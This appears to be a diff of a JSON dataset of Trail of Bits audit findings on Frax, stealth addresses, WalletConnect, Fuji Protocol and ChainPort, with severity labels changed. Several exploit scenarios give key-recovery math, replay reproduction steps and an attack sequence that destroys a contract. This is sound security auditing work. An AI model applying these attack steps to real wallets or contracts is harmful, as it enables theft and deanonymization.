giveFRAXToAMO function in FPIControllerPool.sol However, these functions explicitly convert these variables from uint256 to int256; these conversions will never revert and can produce unexpected results. For instance, if frax_amount is set to a very large unsigned integer, it could be cast to a negative number. Malicious users could exploit this fact by adjusting the variables to integers that will bypass the limits imposed by the code after they are cast.
The same issue affects the implementation of price_info: // Get additional info about the peg status function price_info() public view returns ( int256 collat_imbalance, uint256 cpi_peg_price, uint256 fpi_price, uint256 price_diff_frac_abs ) { fpi_price = getFPIPriceE18(); cpi_peg_price = cpiTracker.currPegPrice(); uint256 fpi_supply = FPI_TKN.totalSupply(); if (fpi_price > cpi_peg_price){ collat_imbalance = int256(((fpi_price - cpi_peg_price) * fpi_supply) / PRICE_PRECISION); price_diff_frac_abs = ((fpi_price - cpi_peg_price) * PEG_BAND_PRECISION) / fpi_price; } else { collat_imbalance = -1 * int256(((cpi_peg_price - fpi_price) * fpi_supply) / PRICE_PRECISION); price_diff_frac_abs = ((cpi_peg_price - fpi_price) * PEG_BAND_PRECISION) / fpi_price; } } Figure 4.2: The price_info function in FPIControllerPool.sol Exploit Scenario Eve submits a governance proposal that can increase the amount of FRAX that can be borrowed. The voters approve the proposal because they believe that the borrowing cap will stop Eve from changing it to a larger value. Recommendations Short term, add checks to the relevant functions to validate the results of explicit integer conversions to ensure that they are within the expected range. Long term, use extensive smart contract fuzzing to test that system invariants cannot be broken.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { "body": "A hash collision could occur in the FraxLendPairDeployer contract, allowing unauthenticated users to block the deployment of certain contracts from authenticated users. The FraxLendPairDeployer contract allows any user to deploy certain contracts using the deploy function, which creates a contract name based on certain parameters: function deploy( address _asset, address _collateral, address _oracleTop, address _oracleDiv, uint256 _oracleNormalization, address _rateContract, bytes calldata _rateInitCallData ) external returns (address _pairAddress) { string memory _name = string( abi.encodePacked( \"FraxLendV1-\", IERC20(_collateral).safeName(), \"/\", IERC20(_asset).safeName(), \" - \", IRateCalculator(_rateContract).name(), \" - \", deployedPairsArray.length + 1 ) ); Figure 6.1: The header of the deploy function in the FraxLendPairDeployer contract The _deploySecond function creates a hash of this contract name and checks it to ensure that it has not already been deployed: function _deploySecond( string memory _name, address _pairAddress, address _asset, address _collateral, uint256 _maxLTV, uint256 _liquidationFee, address _oracleTop, address _oracleDiv, uint256 _oracleNormalization, address _rateContract, bytes memory _rateInitCallData, address[] memory _approvedBorrowers, address[] memory _approvedLenders ) private { bytes32 _nameHash = keccak256(bytes(_name)); require(deployedPairsByName[_nameHash] == address(0), \"FraxLendPairDeployer: Pair name must be unique\"); deployedPairsByName[_nameHash] = _pairAddress; Figure 6.2: Part of the _deploySecond function in the FraxLendPairDeployer contract Both authenticated and unauthenticated users can use this code to deploy contracts, but only authenticated users can select any name for contracts they want to deploy.
Additionally, the _deployFirst function computes a salt based on certain parameters: function _deployFirst( address _asset, address _collateral, uint256 _maxLTV, uint256 _liquidationFee, address _oracleTop, address _oracleDiv, uint256 _oracleNormalization, address _rateContract, bytes memory _rateInitCallData, bool _isBorrowerWhitelistActive, bool _isLenderWhitelistActive ) private returns (address _pairAddress) { { //clones are distinguished by their data bytes32 salt = keccak256( abi.encodePacked( _asset, _collateral, _maxLTV, _liquidationFee, _oracleTop, _oracleDiv, _oracleNormalization, _rateContract, _rateInitCallData, _isBorrowerWhitelistActive, _isLenderWhitelistActive ) ); require(deployedPairsBySalt[salt] == address(0), \"FraxLendPairDeployer: Pair already deployed\"); Figure 6.3: The header of the _deployFirst function in the FraxLendPairDeployer contract Again, both authenticated and unauthenticated users can use this code, but some parameters are fixed for unauthorized users (e.g., _maxLTV will always be DEFAULT_MAX_LTV and cannot be changed). However, in both cases, a hash collision could block contracts from being deployed. For example, if an unauthenticated user sees an authenticated user's pending transaction to deploy a contract, he could deploy his own contract with a name or parameters that result in a hash collision, preventing the authenticated user's contract from being deployed. Exploit Scenario Alice, an authenticated user, starts a custom deployment with certain parameters. Eve, a malicious user, sees Alice's unconfirmed transactions and front-runs them with her own call to deploy a contract with similar parameters. Eve's transaction succeeds, causing Alice's deployment to fail and forcing her to change either the contract's name or the parameters of the call to deploy. Recommendations Short term, prevent collisions between different types of deployments. Long term, review the permissions and capabilities of authenticated and unauthenticated users in every component.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "1. Related-nonce attacks across keys allow root key recovery ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", - "body": "Given multiple addresses generated by the same sender, if any two signatures with the associated private keys use the same nonce, then the recipient's private root key can be recovered. Nonce reuse attacks are a known risk for single ECDSA keys, but this attack extends the vulnerability to all keys generated by a given sender. Exploit Scenario Alice uses Bob's public key to generate addresses P_1 = h(S||1)*G + K and P_2 = h(S||2)*G + K and deposits funds in each. Bob's corresponding private keys will be p_1 = h(S||1) + k and p_2 = h(S||2) + k. Note that, while Alice does not know p_1, p_2, or k, she does know the difference of the two: D = p_2 - p_1 = h(S||2) - h(S||1). As a result, she can write p_2 = p_1 + D. Suppose Bob signs messages with hashes m_1 and m_2 (respectively) to transfer the funds out of P_1 and P_2, and he uses the same nonce n in both signatures. He will output signatures (r, s_1) and (r, s_2), where r = x(n*G), s_1 = n^-1(m_1 + r*p_1), and s_2 = n^-1(m_2 + r*p_1 + r*D). Subtracting the s-values gives us s_1 - s_2 = n^-1(m_1 - m_2 - r*D). Because all the terms except n are known, Alice can recover n, and thus p_1, p_2, and k = p_2 - h(S||2). Recommendations Consider using deterministic nonce generation in any stealth-enabled wallets.
Deterministic nonce generation is an approach used in multiple elliptic curve digital signature schemes, and can be adapted to ECDSA relatively easily; see RFC 6979. Also consider root key blinding: set A_i = h(s||i) * G + h(s||i||\"...\") * B. With blinding, private keys take the form b_i = h(s||i) + h(s||i||\"...\") * b. Since the terms involving b no longer cancel out, Alice cannot find d, and the attack falls apart. Finally, consider using homogeneous key derivation: set A_i = h(s||i) * B. The private key for Bob is then b_i = h(s||i) * b. Because Alice does not know b, she cannot find d, and the attack falls apart. References ECDSA: Handle with Care RFC 6979: Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA)", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "2. Limited forgeries for related keys ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", - "body": "If Bob signs a message for an address generated by Alice, Alice can convert it into a valid signature for another address. She cannot, however, control the hash of the message being signed, so this attack is of limited value. As with the related-nonce attack, this attack relies on Alice knowing the difference in discrete logarithms between two addresses. Exploit Scenario Alice generates addresses A_1 = h(s||1) * G + B and A_2 = h(s||2) * G + B and deposits funds in each account. As before, Alice knows d, the difference of the discrete logs for A_1 and A_2: A_2 = A_1 + d * G. Bob transfers money out of A_2, generating signature (r, s) of a message with hash h, where r is the x-coordinate of k * G (where k is the nonce). The signature is validated by computing R = h * s^-1 * G + r * s^-1 * A_2 and verifying that the x-coordinate of R matches r. Alice can convert this into a signature under A_1 for a message with hash h' = h + r * d. Verifying this signature under A_1, computing R becomes: R = (h + r * d) * s^-1 * G + r * s^-1 * A_1 = h * s^-1 * G + d * r * s^-1 * G + r * s^-1 * A_1 = h * s^-1 * G + r * s^-1 * (A_1 + d * G) = h * s^-1 * G + r * s^-1 * A_2 This is the same relation that makes (r, s) a valid signature on a message with hash h, so the verification will be correct. Note that Alice has no control over the value of h', so to make an effective exploit, she would have to find a preimage m' of h' under the given hash function. Computing preimages is, to date, a hard problem for SHA-256 and related functions. Recommendations Consider root key blinding, as above. The attack relies on Alice knowing d, and root key blinding prevents her from learning it. Consider homogeneous key derivation, as above. Once again, depriving Alice of d obviates the attack completely.", + "title": "1. Use of outdated dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-walletconnectv2-securityreview.pdf", + "body": "We used npm audit and lerna-audit to detect the use of outdated dependencies in the codebase. These tools discovered a number of vulnerable packages that are referenced by the package-lock.json files. The following tables describe the vulnerable dependencies used in the walletconnect-utils and walletconnect-monorepo repositories: walletconnect-utils Dependencies Vulnerability Report Vulnerability", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Informational", "Difficulty: Undetermined" ] }, { - "title": "3.
Mutual transactions can be completely deanonymized ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", - "body": "When Alice and Bob both make stealth payments to each other, they generate the same Shared Secret #i for transaction i, which is used to derive destination keys for Bob and Alice: Symbol", + "title": "2. No protocol-level replay protections in WalletConnect ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-walletconnectv2-securityreview.pdf", + "body": "Applications and wallets using WalletConnect v2 can exchange messages using the WalletConnect protocol through a public WebSocket relay server. Exchanged data is encrypted and authenticated with keys unknown to the relay server. However, using dynamic testing during the audit, we observed that the protocol does not protect against replay attacks. The WalletConnect authentication protocol is essentially a challenge-response protocol between users and servers, where users produce signatures using the private keys from their wallets. A signature is performed over a message containing, among many other components, a nonce value chosen by the server. This nonce value is presumably intended to prevent an adversary from replaying an old signature that a user generated to authenticate themselves. However, there does not seem to be any validation against this nonce value (except validation that it exists), so the library would accept replayed signatures. In addition to missing validation of the nonce value, the payload for the signature does not appear to include the pairing topic for the pairing established between a user and the server. Because the authentication protocol runs only over an existing pairing, it would make sense to include the pairing topic value inside the signature payload. Doing so would prevent a malicious user from replaying another user's previously generated signature for a new pairing that they establish with the server. To repeat our experiment that uncovered this issue, pair the React App demo application with the React Wallet demo application and intercept the traffic generated from the React App demo application (e.g., use a local proxy such as BurpSuite). Initiate a transaction from the application, capture the data sent through the WebSocket channel, and confirm the transaction in the wallet. A sample captured message is shown in figure 2.1. Now, edit the message field slightly and add == to the end of the string (= is the Base64 padding character). Finally, replay (resend) the captured data. A new confirmation dialog box should appear in the wallet. { \"id\" : 1680643717702847 , \"jsonrpc\" : \"2.0\" , \"method\" : \"irn_publish\" , \"params\" : { \"topic\" : \"42507dee006fe8(...)2d797cccf8c71fa9de4\" , \"message\" : \"AFv70BclFEn6MteTRFemaxD7Q7(...)y/eAPv3ETRHL0x86cJ6iflkIww\" , \"ttl\" : 300 , \"prompt\" : true , \"tag\" : 1108 } } Figure 2.1: A sample message sent from the dApp This finding is of undetermined severity because it is not obvious whether and how an attacker could use this vulnerability to impact users. When this finding was originally presented to the WalletConnect team, the recommended remediation was to track and enforce the correct nonce values. However, due to the distributed nature of the WalletConnect system, this could prove difficult in practice. In response, we have updated our recommendation to use timestamps instead.
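A minimal sketch of that remediation (hypothetical field names, not the WalletConnect API): bind the signed payload to the pairing topic and a timestamp, and reject stale or mismatched payloads during verification.

```python
# Sketch of a replay-resistant signature payload; signing/verifying the
# resulting bytes with the wallet key is omitted here.
import json
import time

MAX_SKEW_SECONDS = 120  # acceptance window; a deployment-specific choice

def build_auth_payload(pairing_topic: str, nonce: str) -> bytes:
    payload = {
        "pairingTopic": pairing_topic,     # prevents cross-pairing replay
        "nonce": nonce,                    # server-chosen challenge
        "timestamp": int(time.time()),     # bounds the replay window
    }
    return json.dumps(payload, sort_keys=True).encode()

def accept_auth_payload(raw: bytes, expected_topic: str) -> bool:
    payload = json.loads(raw)
    if payload.get("pairingTopic") != expected_topic:
        return False  # signature was produced for a different pairing
    return abs(time.time() - payload.get("timestamp", 0)) <= MAX_SKEW_SECONDS
```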
Timestamps are not as effective as nonces are for preventing replay attacks because it is not always possible to have a secure clock that can be relied upon. However, if nonces are infeasible to implement, timestamps are the next best option. Recommendations Short term, update the implementation of the authentication protocol to include timestamps in the signature payload that are then checked against the current time (within a reasonable window of time) upon signature validation. In addition to this, include the pairing topic in the signature payload. Long term, consider including all relevant pairing and authentication data in the signature payload, such as sender and receiver public keys. If possible, consider using nonces instead of timestamps to more effectively prevent replay attacks.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "4. Allowing invalid public keys may enable DH private key recovery ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", - "body": "Consider the following three assumptions: 1. Alice can add points that are not on the elliptic curve to the public key database, 2. Bob does not verify the public key points, and 3. Bob's scalar multiplication implementation has some specific characteristics. Assumptions 1 and 2 are currently not specified in the specification, which motivates this finding. If these assumptions hold, then Alice can recover Bob's DH key using a complicated attack, based on the CRYPTO 2000 paper by Biehl et al. and the DCC 2005 paper by Ciet et al. What follows is a rough sketch of the attack. For more details, see the reference publications, which also detail the specific characteristics for Assumption 3. Exploit Scenario Alice roughly follows the following steps: 1. Find a point P' that is not on the curve used for ECDH and that, when used in Bob's scalar multiplication, is effectively on a different curve E' with (a subgroup of) small prime order p'. 2. Brute-force all possible values 0 <= b' < p' of b' = b_dh mod p', and send funds to all addresses with shared secret s' = b' * P', i.e., the stealth addresses h(s'||0) * G + B. 3. Monitor all resulting addresses until Bob withdraws funds from the unique stealth address associated with s' = (b_dh mod p') * P'. This happens because b_dh * P' = (b_dh mod p') * P'. 4. Repeat steps 1-3 for new points P' with different small prime orders p' to recover more residues b_dh mod p'. 5. Use the Chinese Remainder Theorem to recover b_dh from the residues. As a result, Alice can now track all stealth payments made to Bob (but cannot steal funds). To understand the complexity of this attack, it is sufficient for Alice to repeat steps 1-3 for the first 44 primes (numbers between 2 and 193). This requires Alice to make 3,831 payments in total (corresponding to the sum of the first 44 primes). There is a tradeoff where Alice uses fewer primes, which means that fewer transactions are needed. However, it means that Alice does not recover the full b_dh. To compensate for this, Alice can brute-force the discrete logarithm of B_dh guided by the partial information on b_dh. Because the attack compromises anonymity for a particular user without giving access to funds, we consider this issue to have medium severity. As this is a complicated attack with various assumptions that requires Bob to access the funds from all his stealth addresses, we consider this issue to have high difficulty.
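The validations recommended below are straightforward to implement; a minimal sketch for secp256k1 (an assumed curve choice, for illustration only):

```python
# Public key validation sketch for secp256k1: y^2 = x^3 + 7 over F_P.
P = 2**256 - 2**32 - 977  # the secp256k1 field prime

def is_valid_public_key(point) -> bool:
    if point is None:  # reject the point at infinity
        return False
    x, y = point
    if not (0 <= x < P and 0 <= y < P):  # coordinates must be field elements
        return False
    return (y * y - (x * x * x + 7)) % P == 0  # point-on-curve check

# secp256k1 has cofactor 1, so no small-order-subgroup check is needed here;
# on curves with a larger cofactor, also verify that n * Q is the point at
# infinity for the group order n.
```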
Recommendations The specification should enforce that public keys are validated for correctness, both when they are added to the public database and when they are used by senders and receivers. These validations should include point-on-curve checks, small-order-subgroup checks (if applicable), and point-at-infinity checks. References Differential Fault Attacks on Elliptic Curve Cryptosystems, Biehl et al., 2000 Elliptic Curve Cryptosystems in the Presence of Permanent and Transient Faults, Ciet et al., 2005", + "title": "3. Key derivation code could produce keys composed of all zeroes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-walletconnectv2-securityreview.pdf", + "body": "The current implementation of the code that derives keys using the x25519 library does not enable the rejectZero option. If the counterparty is compromised, this may result in a derived key composed of all zeros, which could allow an attacker to observe or tamper with the communication. export function deriveSymKey(privateKeyA: string , publicKeyB: string ): string { const sharedKey = x25519.sharedKey( fromString(privateKeyA, BASE16), fromString(publicKeyB, BASE16), ); const hkdf = new HKDF(SHA256, sharedKey); const symKey = hkdf.expand(KEY_LENGTH); return toString(symKey, BASE16); } Figure 3.1: The code that derives keys using x25519.sharedKey ( walletconnect-monorepo/packages/utils/src/crypto.ts#3543 ) The x25519 library includes a warning about this case: /** * Returns a shared key between our secret key and a peer's public key. * * Throws an error if the given keys are of wrong length. * * If rejectZero is true throws if the calculated shared key is all-zero. * From RFC 7748: * * > Protocol designers using Diffie-Hellman over the curves defined in * > this document must not assume \"contributory behavior\". Specifically, * > contributory behavior means that both parties' private keys * > contribute to the resulting shared key. Since curve25519 and * > curve448 have cofactors of 8 and 4 (respectively), an input point of * > small order will eliminate any contribution from the other party's * > private key. This situation can be detected by checking for the all- * > zero output, which implementations MAY do, as specified in Section 6. * > However, a large number of existing implementations do not do this. * * IMPORTANT: the returned key is a raw result of scalar multiplication. * To use it as a key material, hash it with a cryptographic hash function. */ Figure 3.2: Warnings in x25519.sharedKey ( stablelib/packages/x25519/x25519.ts#595615 ) This finding is of informational severity because a compromised counterparty would already allow an attacker to observe or tamper with the communication. Exploit Scenario An attacker compromises the web server on which a dApp is hosted and introduces malicious code in the front end that makes it always provide a low-order point during the key exchange. When a user connects to this dApp with their WalletConnect-enabled wallet, the derived key is all zeros. The attacker passively captures and reads the exchanged messages. Recommendations Short term, enable the rejectZero flag for uses of the deriveSymKey function. Long term, when using cryptographic primitives, research any edge cases they may have and always review relevant implementation notes.
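As an illustration of such a check, a minimal Python sketch using the pyca/cryptography X25519 API (a different library than the TypeScript code above; some implementations already reject all-zero outputs internally, so treat this purely as defense in depth):

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import (
    X25519PrivateKey,
    X25519PublicKey,
)
from cryptography.hazmat.primitives.kdf.hkdf import HKDFExpand

def derive_sym_key(private_key: X25519PrivateKey, peer: X25519PublicKey) -> bytes:
    shared = private_key.exchange(peer)
    # Contributory-behavior check from RFC 7748: a low-order peer point
    # yields an all-zero shared secret, which must be rejected.
    if shared == bytes(32):
        raise ValueError("all-zero shared secret: low-order peer public key")
    # Hash the raw scalar-multiplication result before using it as key
    # material, as the x25519 library's own comment advises.
    return HKDFExpand(algorithm=hashes.SHA256(), length=32, info=None).derive(shared)
```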
Follow recommended practices and include any defense-in-depth safety checks to ensure the protocol operates as intended.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1220,29 +1220,29 @@ ] }, { - "title": "1. Anyone can destroy the FujiVault logic contract if its initialize function was not called during deployment ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Anyone can destroy the FujiVault logic contract if its initialize function has not already been called. Calling initialize on a logic contract is uncommon, as usually nothing is gained by doing so. The deployment script does not call initialize on any logic contract. As a result, the exploit scenario detailed below is possible after deployment. This issue is similar to a bug in AAVE that was found in 2020. OpenZeppelin's hardhat-upgrades plug-in protects against this issue by disallowing the use of selfdestruct or delegatecall on logic contracts. However, the Fuji Protocol team has explicitly worked around these protections by calling delegatecall in assembly, which the plug-in does not detect. Exploit Scenario The Fuji contracts are deployed, but the initialize functions of the logic contracts are not called. Bob, an attacker, deploys a contract to the address alwaysSelfdestructs, which simply always executes the selfdestruct opcode. Additionally, Bob deploys a contract to the address alwaysSucceeds, which simply never reverts. Bob calls initialize on the FujiVault logic contract, thereby becoming its owner. To make the call succeed, Bob passes 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE as the value for the _collateralAsset and _borrowAsset parameters. He then calls FujiVaultLogic.setActiveProvider(alwaysSelfdestructs), followed by FujiVault.setFujiERC1155(alwaysSucceeds) to prevent an additional revert in the next and final call. Finally, Bob calls FujiVault.deposit(1), sending 1 wei. This triggers a delegatecall to alwaysSelfdestructs, thereby destroying the FujiVault logic contract and making the protocol unusable until its proxy contract is upgraded. Because OpenZeppelin's upgradeable contracts do not check for a contract's existence before a delegatecall (TOB-FUJI-003), all calls to the FujiVault proxy contract now succeed. This leads to exploits in any protocol integrating the Fuji Protocol. For example, a call that should repay all debt will now succeed even if no debt is repaid. Recommendations Short term, do not use delegatecall to implement providers. See TOB-FUJI-002 for more information. Long term, avoid the use of delegatecall, as it is difficult to use correctly and can introduce vulnerabilities that are hard to detect.", + "title": "4. Insecure storage of session data in local storage ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-walletconnectv2-securityreview.pdf", + "body": "HTML5 local storage is used to hold session data, including keychain values. Because there are no access controls on modifying and retrieving this data using JavaScript, data in local storage is vulnerable to XSS attacks. Figure 4.1: Keychain data stored in a browser's localStorage Exploit Scenario Alice discovers an XSS vulnerability in a dApp that supports WalletConnect. This vulnerability allows Alice to retrieve the dApp's keychain data, allowing her to propose new transactions to the connected wallet. Recommendations Short term, consider using cookies to store and send tokens.
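As a sketch of the cookie-based approach (a hypothetical Flask endpoint; the flag names are equivalent in most web frameworks):

```python
from flask import Flask, make_response

app = Flask(__name__)

@app.route("/session")
def issue_session():
    resp = make_response("ok")
    resp.set_cookie(
        "session_token",
        "opaque-token-value",   # placeholder; issue a real random token
        httponly=True,          # hidden from document.cookie, blunting XSS theft
        secure=True,            # sent only over HTTPS
        samesite="Strict",      # also limits cross-site request exposure
    )
    return resp
```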
Use the cross-site request forgery (CSRF) protection libraries available to mitigate these attacks. Ensure that cookies are tagged with httpOnly, and preferably secure, to ensure that JavaScript cannot access them. References OWASP HTML5 Security Cheat Sheet: Local Storage A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "2. Providers are implemented with delegatecall ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The system uses delegatecall to execute an active provider's code on a FujiVault, making the FujiVault the holder of the positions in the borrowing protocol. However, delegatecall is generally error-prone, and the use of it introduced the high-severity finding TOB-FUJI-001. It is possible to make a FujiVault the holder of the positions in a borrowing protocol without using delegatecall. Most borrowing protocols include a parameter that specifies the receiver of tokens that represent a position. For borrowing protocols that do not include this type of parameter, tokens can be transferred to the FujiVault explicitly after they are received from the borrowing protocol; additionally, the tokens can be transferred from the FujiVault to the provider before they are sent to the borrowing protocol. These solutions are conceptually simpler than and preferred to the current solution. Recommendations Short term, implement providers without the use of delegatecall. Set the receiver parameters to the FujiVault, or transfer the tokens corresponding to the position to the FujiVault. Long term, avoid the use of delegatecall, as it is difficult to use correctly and can introduce vulnerabilities that are hard to detect.", + "title": "1. Several secrets checked into source control ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The chainport-backend repository contains several secrets that are checked into source control. Secrets that are stored in source control are accessible to anyone who has had access to the repository (e.g., former employees or attackers who have managed to gain access to the repository). We used TruffleHog to identify these secrets (by running the command trufflehog git file://. in the root directory of the repository). TruffleHog found several types of credentials, including the following, which were verified through TruffleHog's credential verification checks: GitHub personal access tokens Slack access tokens TruffleHog also found unverified GitLab authentication tokens and Polygon API credentials. Furthermore, we found hard-coded credentials, such as database credentials, in the source code, as shown in figure 1.1. [REDACTED] Figure 1.1: chainport-backend/env.prod.json#L3-L4 Exploit Scenario An attacker obtains a copy of the source code from a former DcentraLab employee. The attacker extracts the secrets from it and uses them to exploit DcentraLab's database and insert events in the database that did not occur. Consequently, ChainPort's AWS lambdas process the fake events and allow the attacker to steal funds. Recommendations Short term, remove credentials from source control and rotate them. Run TruffleHog by invoking the trufflehog git file://.
command; if it identifies any unverified credentials, check whether they need to be addressed. Long term, consider using a secret management solution such as Vault to store secrets. 2. Same credentials used for staging, test, and production environment databases Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-2 Target: Database authentication", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "3. Lack of contract existence check on delegatecall will result in unexpected behavior ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The VaultControlUpgradeable and Proxy contracts use the delegatecall proxy pattern. If the implementation contract is incorrectly set or self-destructed, the contract may not be able to detect failed executions. The VaultControlUpgradeable contract includes the _execute function, which users can invoke indirectly to execute a transaction to a _target address. This function does not check for contract existence before executing the delegatecall (figure 3.1). /** * @dev Returns byte response of delegatcalls */ function _execute(address _target, bytes memory _data) internal whenNotPaused returns (bytes memory response) { /* solhint-disable */ assembly { let succeeded := delegatecall(sub(gas(), 5000), _target, add(_data, 0x20), mload(_data), 0, 0) let size := returndatasize() response := mload(0x40) mstore(0x40, add(response, and(add(add(size, 0x20), 0x1f), not(0x1f)))) mstore(response, size) returndatacopy(add(response, 0x20), 0, size) switch iszero(succeeded) case 1 { // throw if delegatecall failed revert(add(response, 0x20), size) } } /* solhint-disable */ } Figure 3.1: fuji-protocol/contracts/abstracts/vault/VaultBaseUpgradeable.sol#L93-L115 The Proxy contract, deployed by the @openzeppelin/hardhat-upgrades library, includes a payable fallback function that invokes the _delegate function when proxy calls are executed. This function is also missing a contract existence check (figure 3.2). /** * @dev Delegates the current call to `implementation`. * * This function does not return to its internall call site, it will return directly to the external caller. */ function _delegate(address implementation) internal virtual { // solhint-disable-next-line no-inline-assembly assembly { // Copy msg.data. We take full control of memory in this inline assembly // block because it will not return to Solidity code. We overwrite the // Solidity scratch pad at memory position 0. calldatacopy(0, 0, calldatasize()) // Call the implementation. // out and outsize are 0 because we don't know the size yet. let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0) // Copy the returned data. returndatacopy(0, 0, returndatasize()) switch result // delegatecall returns 0 on error. case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) } } } Figure 3.2: Proxy.sol#L16-L41 A delegatecall to a destructed contract will return success (figure 3.3). Due to the lack of contract existence checks, a series of batched transactions may appear to be successful even if one of the transactions fails. The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed.
Figure 3.3: A snippet of the Solidity documentation detailing unexpected behavior related to delegatecall Exploit Scenario Eve upgrades the proxy to point to an incorrect new implementation. As a result, each delegatecall returns success without changing the state or executing code. Eve uses this to scam users. Recommendations Short term, implement a contract existence check before any delegatecall. Document the fact that suicide and selfdestruct can lead to unexpected behavior, and prevent future upgrades from using these functions. Long term, carefully review the Solidity documentation, especially the Warnings section, and the pitfalls of using the delegatecall proxy pattern. References Contract Upgrade Anti-Patterns Breaking Aave Upgradeability", + "title": "3. Use of error-prone pattern for logging functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The pattern shown in figure 3.1 is used repeatedly throughout the codebase to log function names. [REDACTED] Figure 3.1: An example of the pattern used by ChainPort to log function names This pattern is prone to copy-and-paste errors. Developers may copy the code from one function to another but forget to change the function name, as exemplified in figure 3.2. [REDACTED] Figure 3.2: An example of an incorrect use of the pattern used by ChainPort to log function names We wrote a Semgrep rule to detect these problems (appendix D). This rule detected 46 errors associated with this pattern in the back-end application. Figure 3.3 shows an example of one of these findings. [REDACTED] Figure 3.3: An example of one of the 46 errors resulting from the function-name logging pattern (chainport-backend/modules/web_3/helpers.py#L313-L315) Exploit Scenario A ChainPort developer is auditing the back-end application logs to determine the root cause of a bug. Because an incorrect function name was logged, the developer cannot correctly trace the application's flow and determine the root cause in a timely manner. Recommendations Short term, use the Python decorator in figure 3.4 to log function names. This will eliminate the risk of copy-and-paste errors. [REDACTED] Figure 3.4: A Python decorator that logs function names, eliminating the risk of copy-and-paste errors Long term, review the codebase for other error-prone patterns. If such patterns are found, rewrite the code in a way that eliminates or reduces the risk of errors, and write a Semgrep rule to find the errors before the code hits production.", "labels": [ "Trail of Bits", "Severity: Low", @@ -1250,9 +1250,9 @@ ] }, { - "title": "4. FujiVault.setFactor is unnecessarily complex and does not properly handle invalid input ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiVault contract's setFactor function sets one of four state variables to a given value. Which state variable is set depends on the value of a string parameter. If an invalid value is passed, setFactor succeeds but does not set any of the state variables. This creates edge cases, makes writing correct code more difficult, and increases the likelihood of bugs.
function setFactor( uint64 _newFactorA, uint64 _newFactorB, string calldata _type ) external isAuthorized { bytes32 typeHash = keccak256(abi.encode(_type)); if (typeHash == keccak256(abi.encode(\"collatF\"))) { collatF.a = _newFactorA; collatF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"safetyF\"))) { safetyF.a = _newFactorA; safetyF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"bonusLiqF\"))) { bonusLiqF.a = _newFactorA; bonusLiqF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"protocolFee\"))) { protocolFee.a = _newFactorA; protocolFee.b = _newFactorB; } } Figure 4.1: FujiVault.sol#L475-494 Exploit Scenario A developer on the Fuji Protocol team calls setFactor from another contract. He passes a type that is not handled by setFactor. As a result, code that is expected to set a state variable does nothing, resulting in a more severe vulnerability. Recommendations Short term, replace setFactor with four separate functions, each of which sets one of the four state variables. Long term, avoid string constants that simulate enumerations, as they cannot be checked by the typechecker. Instead, use enums and ensure that any code that depends on enum values handles all possible values.", + "title": "4. Use of hard-coded strings instead of constants ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back-end code uses several hard-coded strings that could be defined as constants to prevent any typos from introducing vulnerabilities. For example, the checks that determine the system's environment compare the result of the get_env function with the strings develop, staging, prod, or local. Figure 4.1 shows an example of one of these checks. [REDACTED] Figure 4.1: chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L42-L43 We did not find any typos in these literal strings, so we set the severity of this finding to informational. However, the use of hard-coded strings in place of constants is not best practice; we suggest fixing this issue and following other best practices for writing safe code to prevent the introduction of bugs in the future. Exploit Scenario A ChainPort developer creates code that should run only in the development build and safeguards it with the check in figure 4.2. [REDACTED] Figure 4.2: An example of a check against a hard-coded string that could lead to a vulnerability This test always fails; the correct value to test should have been develop. Now, the poorly tested, experimental code that was meant to run only in development mode is deployed in production. Recommendations Short term, create a constant for each of the four possible environments. Then, to check the system's environment, import the corresponding constant and use it in the comparison instead of the hard-coded string. Alternatively, use an enum instead of a string to perform these comparisons. Long term, review the code 